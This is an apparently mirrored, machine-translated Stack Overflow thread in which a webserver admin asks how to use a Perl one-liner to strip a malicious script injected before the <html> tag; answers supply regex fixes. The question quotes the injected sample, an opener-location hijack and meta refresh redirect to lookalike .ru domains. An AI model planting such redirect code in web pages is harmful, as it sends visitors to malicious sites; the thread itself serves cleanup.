简体   繁体   English

怎么能在之前更换一切 <html> 用Perl命令标记?

[英]How can I replace everything before the <html> tag with a Perl command?

A folder on a webserver I manage was recently infected, and a malicious script was placed before the opening <html> tag on a whole mess of files. 我管理的网络服务器上的文件夹最近被感染了,并且在一堆乱七八糟的文件上打开了一个恶意脚本,打开了<html>标签。 I'm trying to execute a perl string replace script to clean it out. 我正在尝试执行perl字符串替换脚本来清除它。

The malicious files look something like this: 恶意文件看起来像这样:

<script language="JavaScript">
parent.window.opener.location="http://vkk.coom.ny8pbpk.ru?nhzwhhh=ZE9taWlsX2nkPRE0LmZub3ffaUQ9PTM3MCbjb0RlNWFlZnrvaEx2b2JydWLuYUJxfwC%3D%3D";
</script>
<meta http-equiv="refresh" content="0;URL=http://yandex.ru.ny8pbpk.ru?pk=i%2FGWhteXsNcf0qzPwdiVgMkkhvrG1YbO25gYgPqe2saQmdIDmeiUlsiXmNEQmPCfhMSD5" />
<html>
<head>
......and the file goes on

I'm something of a mess with Regex, and I've tried to glean as much as I can from other StackOverflow posts on how to use perl's string replace. 我和Regex混淆了,我试图从其他StackOverflow帖子中尽可能多地收集有关如何使用perl的字符串替换的信息。 The biggest issue I'm running into is making it work over multiple lines. 我遇到的最大问题是让它在多行上运行。

Here's what I have so far: 这是我到目前为止所拥有的:

perl -0777 -i -pe 's/\s*<html>/<html>/s' index.html    

This seems to have no effect. 这似乎没有效果。 If I change the second <html> to <foobar> it correctly replaces with foobar, but it ignores everything in front of it. 如果我将第二个<html>更改为<foobar>它会正确地替换为foobar,但它会忽略前面的所有内容。

From what I can tell, the -0777 flag is supposed to "slurp" as one line, and the \\s* should match the entire string before <html> , but again, my regex is lacking. 据我所知, -0777标志应该“ -0777 ”为一行,并且\\s*应该在<html>之前匹配整个字符串,但同样,我的正则表达式缺乏。 Any help is greatly appreciated! 任何帮助是极大的赞赏!

Try this: 尝试这个:

perl -0777 -i -pe 's/^.*(?=<html>)//s' index.html

or this more safer and effective pattern: 或者这种更安全有效的模式:

perl -0777 -i -pe 's/^(?>[^<]++|<(?!html>))*(?=<html>)//' index.html

\\s* is too specific. \\ s *太具体了。 You don't only want to match whitespace before the . 你不仅希望在之前匹配空格。 Try .* which matches everything before the 尝试。*匹配之前的所有内容

\\s* should be [\\s\\S]* so it matches all characters. \\s*应该是[\\s\\S]*所以它匹配所有字符。

I found this as a great reference: http://www.cs.tut.fi/~jkorpela/perl/regexp.html 我发现这是一个很好的参考: http//www.cs.tut.fi/~jkorpela/perl/regexp.html

So the final working command is: 所以最后的工作命令是:

perl -0777 -i -pe 's/[\\s\\S]*<html>/<html>/s' index.html

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM